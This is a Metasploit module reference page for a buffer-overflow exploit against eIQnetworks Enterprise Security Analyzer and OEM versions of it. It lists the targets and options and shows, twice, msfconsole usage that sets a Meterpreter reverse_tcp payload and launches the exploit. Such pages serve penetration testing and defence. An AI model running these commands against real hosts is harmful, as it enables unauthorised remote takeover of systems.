Browse Exploit & Auxiliary Modules
The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.
Search for modules
eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow
This module exploits a stack buffer overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the LICMGR_ADDLICENSE command, a stack-based buffer overflow occurs. This module has only been tested against ESA v2.1.13.
Rank
- Average
Authors
- MC < mc [at] metasploit.com >
- ri0t < ri0t [at] ri0tnet.net >
- kf < kf_list [at] digitalmunition.com >
References
Exploit Targets
- 0 - EnterpriseSecurityAnalyzerv21 Universal
- 1 - EiQ Enterprise Security Analyzer Offset 494 Windows 2000 SP0-SP4 English
- 2 - EiQ Enterprise Security Analyzer Offset 494 Windows XP English SP1/SP2
- 3 - EiQ Enterprise Security Analyzer Offset 494 Windows Server 2003 SP0/SP1
- 4 - Astaro Report Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English
- 5 - Astaro Report Manager (OEM) Offset 1262 Windows XP English SP1/SP2
- 6 - Astaro Report Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1
- 7 - Fortinet FortiReporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English
- 8 - Fortinet FortiReporter (OEM) Offset 1262 Windows XP English SP1/SP2
- 9 - Fortinet FortiReporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1
- 10 - iPolicy Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English
- 11 - iPolicy Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2
- 12 - iPolicy Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1
- 13 - SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English
- 14 - SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows XP English SP1/SP2
- 15 - SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1
- 16 - Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English
- 17 - Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2
- 18 - Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1
- 19 - Top Layer Network Security Analyzer (OEM) Offset 1262 Windows 2000 SP0-SP4 English
- 20 - Top Layer Network Security Analyzer (OEM) Offset 1262 Windows XP English SP1/SP2
- 21 - Top Layer Network Security Analyzer (OEM) Offset 1262 Windows Server 2003 English SP0/SP1
Development
Similar Modules
- exploit/windows/misc/agentxpp_receive_agentx
- exploit/windows/misc/apple_quicktime_rtsp_response
- exploit/windows/misc/asus_dpcproxy_overflow
- exploit/windows/misc/avidphoneticindexer
- exploit/windows/misc/bakbone_netvault_heap
- exploit/windows/misc/bcaaa_bof
- exploit/windows/misc/bigant_server
- exploit/windows/misc/bigant_server_250
- exploit/windows/misc/bigant_server_usv
- exploit/windows/misc/bomberclone_overflow
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/misc/eiqnetworks_esa
msf exploit(eiqnetworks_esa) > show payloads
msf exploit(eiqnetworks_esa) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(eiqnetworks_esa) > set LHOST [MY IP ADDRESS]
msf exploit(eiqnetworks_esa) > set RHOST [TARGET IP]
msf exploit(eiqnetworks_esa) > show targets
msf exploit(eiqnetworks_esa) > set TARGET [TARGET ID]
msf exploit(eiqnetworks_esa) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/misc/eiqnetworks_esa
msf exploit(eiqnetworks_esa) > show payloads
msf exploit(eiqnetworks_esa) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(eiqnetworks_esa) > set LHOST [MY IP ADDRESS]
msf exploit(eiqnetworks_esa) > set RHOST [TARGET IP]
msf exploit(eiqnetworks_esa) > show targets
msf exploit(eiqnetworks_esa) > set TARGET [TARGET ID]
msf exploit(eiqnetworks_esa) > exploit
Module Options
| RHOST | The target address |
| RPORT | The target port (default: 10616) |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| Proxies | Use a proxy chain |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| TCP::max_send_size | Maxiumum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |